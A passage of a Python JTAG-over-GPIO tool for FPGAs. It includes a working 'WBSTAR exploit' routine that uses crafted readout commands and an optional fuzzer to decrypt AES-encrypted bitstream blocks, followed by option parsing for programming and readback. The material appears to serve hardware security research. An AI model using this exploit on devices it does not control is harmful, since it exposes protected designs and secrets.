#jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
jtag_legs.append([JtagLeg.DRC, readout_cmd, 'readout_command'])
jtag_legs.append([JtagLeg.IRD, '000100', 'cfg_out'])
jtag_legs.append([JtagLeg.DRR, '00000000000000000000000000000000', 'readout'])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IR, '010100', 'noop'])
while len(jtag_legs):
jtag_next()
if use_fuzzer:
print("Read command offset {} recovered word: {}".format(str(ro_fuzz), hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big'))))
else:
logging.debug("Recovered word at %s: %s", str(ro_fuzz), hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')))
recovered[3-word_index] = readdata
block[3-word_index] = int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')
else:
### preferred command
readout_cmd = 0xaa99556620000000280200012000000020000000
### induse soft reset + iprog to recover WBSTAR via pins
#readout_cmd = 0xffffffffaa99556620000000280200012000000020000000300080010000000f20000000
#readout_cmd = 0xffffffffaa9955662000000030020001e000000028020001300080010000000f20000000
### command as from Ender paper
# readout_cmd = 0xffffffffffffffffffffffffffffffffffffffffffffffff000000bb11220044ffffffffffffffffaa9955662000000030008001000000042000000020000000200000002802000120000000200000002000000020000000
# now perform the readout
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IRD, '000101', 'cfg_in'])
jtag_legs.append([JtagLeg.DRC, int_to_binstr(readout_cmd), 'readout_command'])
jtag_legs.append([JtagLeg.DL, '0', 'delay'])
jtag_legs.append([JtagLeg.IR, '000100', 'cfg_out'])
jtag_legs.append([JtagLeg.DRR, '00000000000000000000000000000000', 'readout'])
jtag_legs.append([JtagLeg.RS, '0', 'reset'])
jtag_legs.append([JtagLeg.IR, '010100', 'noop'])
while len(jtag_legs):
jtag_next()
# print("Recovered word: {}".format(hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big'))))
# input("Press enter to continue...")
logging.debug("Recovered word: %s", hex(int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')))
recovered[3-word_index] = readdata
block[3-word_index] = int.from_bytes(bitflip(readdata.to_bytes(4, byteorder='big')), byteorder='big')
print('AES block {} is 0x{:08x}{:08x}{:08x}{:08x}'.format(offset, block[0], block[1], block[2], block[3]))
# python sux
def auto_int(x):
return int(x, 0)
def main():
global TCK_pin, TMS_pin, TDI_pin, TDO_pin, PRG_pin
global jtag_legs, jtag_results
global gpio_pointer
global compat
global use_key, nky_key, nky_iv, nky_hmac, use_fuzzer
GPIO.setwarnings(False)
parser = argparse.ArgumentParser(description="Drive JTAG via Rpi GPIO")
parser.add_argument(
"-f", "--file", required=True, help="file containing jtag command list or bitstream", type=str
)
parser.add_argument(
"-b", "--bitstream", default=False, action="store_true", help="input file is a bitstream, not a JTAG command set (mutually exclusive with --raw-binary)"
)
parser.add_argument(
"--raw-binary", default=False, action="store_true", help="input file is a raw binary, not a JTAG command set (mutually exclusive with -b)"
)
parser.add_argument(
"-w", "--wbstar", help="Decode one AES block using WBSTAR exploit. Offset is specified in units of 128-bit blocks.", type=int
)
parser.add_argument(
"-c", "--compat", default=False, action="store_true", help="Use compatibility mode (warning: about 100x slower than FFI)"
)
parser.add_argument(
"-d", "--debug", help="turn on debugging spew", default=False, action="store_true"
)
parser.add_argument(
'--tdi', type=int, help="Specify TDI GPIO. Defaults to 27", default=27
)
parser.add_argument(
'--tdo', type=int, help="Specify TDO GPIO. Defaults to 22", default=22
)
parser.add_argument(
'--tms', type=int, help="Specify TMS GPIO. Defaults to 17", default=17
)
parser.add_argument(
'--tck', type=int, help="Specify TCK GPIO. Defaults to 4", default=4
)
parser.add_argument(
'--prg', type=int, help="Specify PRG (prog) GPIO. Defaults to 24", default=24
)
parser.add_argument(
"-i", "--input-key", help="Use specified .nky file to create readout command", type=str
)
parser.add_argument(
"-p", "--phuzz", help="Fuzz readout addresses on wbstar exploit with encrypted readout commands", default=False, action="store_true"
)
parser.add_argument(
"-s", "--spi-mode", help="Program a SPI memory using JTAGSPI", default=False, action="store_true"
)
parser.add_argument(
"-j", "--jtagspi-variant", help="Use the specified jtagspi bitstream variant, defaults to xc7s50", type=str, default="xc7s50"
)
parser.add_argument(
"-a", "--address", help="Address to load code into SPI memory, defaults to 0", type=auto_int, default=0
)
parser.add_argument(
"-n", "--no-verify", help="When selected, skips verification of SPI memory", default=False, action="store_true"
)
parser.add_argument(
"-r", "--reset-prog", help="Pull the PROG pin before initiating any commands", default=False, action="store_true"
)
parser.add_argument(
"--read", help="reads data to a file (argument is the filename)", default=False, action="store_true"
)
parser.add_argument(
"--read-len", help="length of data to read", default=0x280000, type=auto_int
)
parser.add_argument(